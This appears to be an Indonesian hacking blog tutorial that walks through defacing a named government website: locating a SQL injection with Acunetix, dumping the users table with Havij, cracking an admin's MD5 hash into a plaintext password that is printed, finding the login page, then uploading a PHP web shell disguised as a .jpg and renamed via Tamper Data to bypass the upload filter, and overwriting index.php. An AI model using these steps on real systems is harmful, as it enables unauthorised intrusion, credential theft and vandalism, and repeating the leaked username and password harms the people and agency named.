klik sql injection lalu pilih parameternya lalu klik dan muncul keterangan di sebelah kanan tampilan acunetix
> lalu launch the attack with http editor 


setelah di klik launch the attack with http editor maka muncul jendela baru

copy path injection
disini path korban saya  /peringatan_dini.php?bulan=9-2+4-2-2&tahun=2012

lalu pastekan pada adress bar mozilla dan copy lagi semuanya pada adress bar
jadinya  vsi.esdm.go.id/peringatan_dini.php?bulan=9-2+4-2-2&tahun=2012 kayaknya ini bener – bener rentan sql injection liat gambar di bawah
artikelnya kosong


sekarang waktunya untuk menyuntikkan sql dengan tool havij yang sudah kalian download tadi
buka toolnya

lalu pastekan url korban yang telah anda copykan tadi pada kotak target lalu analyze


 tunggu sampai scanning selesai dan sukses injection
apabila success injection muncul nama database nya dan tombol table telah di buka

alu klik tombol table dan pilih get tables untuk mendapatkan table sql


lau muncul nama-nama table nya
pilih sekiranya dimana letak admin login databasenya
disini letak admin loginya berada pada table users
lalu centang table users lalu klik GET COLOUMNS


setelah mendapatkan coloumn sekarang kita mencari user dan pass loginya dengan men ceklist username dan passwordnya
lalu klik GET DATA

tunggu …….

lalu muncul duehh user loginya admin

hmmm…. kayaknya ini password masih di enskripsi hash md5
tapi jangan patah semangat coba kita dekript dulu make tool decrypt online atau john the ripper
juga bisa make google database agar pekerjaan kita lebih cepat

disini kita coba decrypt login admin yana soalnya akses levelnya juga admin dan password di google databasenya juga tersedia
kita decrypt 930d35238e22c6bf400a959e470d4949 dengan google database
buka google lalu pastekan hash md5 pada kolom search

lalu google akan mencari pilih salah satu dari temuan google
dan akhrinya berhasil menemukan hash tersebut passwornya adalah merapi jadi loginya user = yana pass = merapi


sekarang password sudah ketemu sekarang yang diakukan adalah mencari halaman ogin web korban dengan tool admin login finder yang telah kalian download tadi buka toolnya dan masukkan alamat url korban pada kolom lalu scan

NAHH . .  sudah ketemu loginya sekarang kita coba masuk sebagai admin
bersiap siaplah
login dengan username & password yang telah kita temukan tadi

dan sukses kita dah masuk sebagai admin

sekarang apa yang kita lakuakan setelah masuk sebagai admin
yups .  . bener sekali tujuan kita disini adalah merubah tampilan depan web
jadi yang kita lakukan adalah menanam shell backdoor pada website korban

apa itu shell backdoor

buat yang suka deface pasti sudah tau tentang Backdoor “pintu be
lakang” alias jalan pintas buat akses log on situs web, gak cuma itu sih kita juga bisa leluasa kalo mengexploitasi web dengan menggunakan Backdoor ( shell ) tanpa harus login sebagai administrator kita punya kuasa yang sama dengan admin aselinya hehe,

kalau web menggunakan cms joomla bisa baca-baca dulu di –>Upload shell pada joomla

 

kalau web menggunakan cms wordpress bisa di lihat di –> Upload shell pada wordpress

maka kita harus mencari sendiri servis uploadnya
biasanaya terdapat pada upload image 

lets go

disini  letak upoad image nya berada pada static content > header


lalu pilih tambah header dan edit judul dan browse shell backdoor yang telah kalian download tadi

JANGAN LUPA SHELL BACKDOOR DIRUBAH EKSTENSI NYA YANG TADINYA .PHP DIRUBAH MENJADI .JPG

pilih shell.jpg yang telah kalian rubah ekstensinya


setelah selesai memilih shell jangan upload dulu kita install dulu addon tamper data
apa bila belum punya tamper data silahkan download di http://addons.mozilla.org/id/firefox/addon/tamper-data/eula/79565?src=dp-btn-primary

setelah itu install dan buka tamper data pada mozilla tools > tamper data

lalu klik start


lalu segera balik ke halaman upload shell.jpg tadi dan segeralah upload
lalu muncul dialog pada tamper dta klik TAMPER

lalu pada layar jendela tamper popup di sebelah kanan layar post_data cari shell.jpg disini saya menggunakan becak.jpg
lalu cari becak.jpg setelah ketemu rubah ekstensi menjadi .PHP jadinya becak.php


dan sukses di upload shell.php kita
dan sekarang kita mencari letak shellnya untuk di panggil

buka lagi judul yang telah kita buat tadi klik edit


lalu klik kanan pada gambar dan pilih copy image location


setelah di copy paste pada adress bar mozilla jadinya

http://vsi.esdm.go.id/foto_banner/becak.php


dan berhasil kita sudah masuk pada shell backdoor


sekarang kita pergi ke halaman depan web tersebut cari index.php / index.html website



dan rubah source kode pada index.php dengan mengkik edit

hapus semua code dalam index.php rubah dengan source code html kalian atau bisa langsung upload file index.html kalian dan lihat hasinya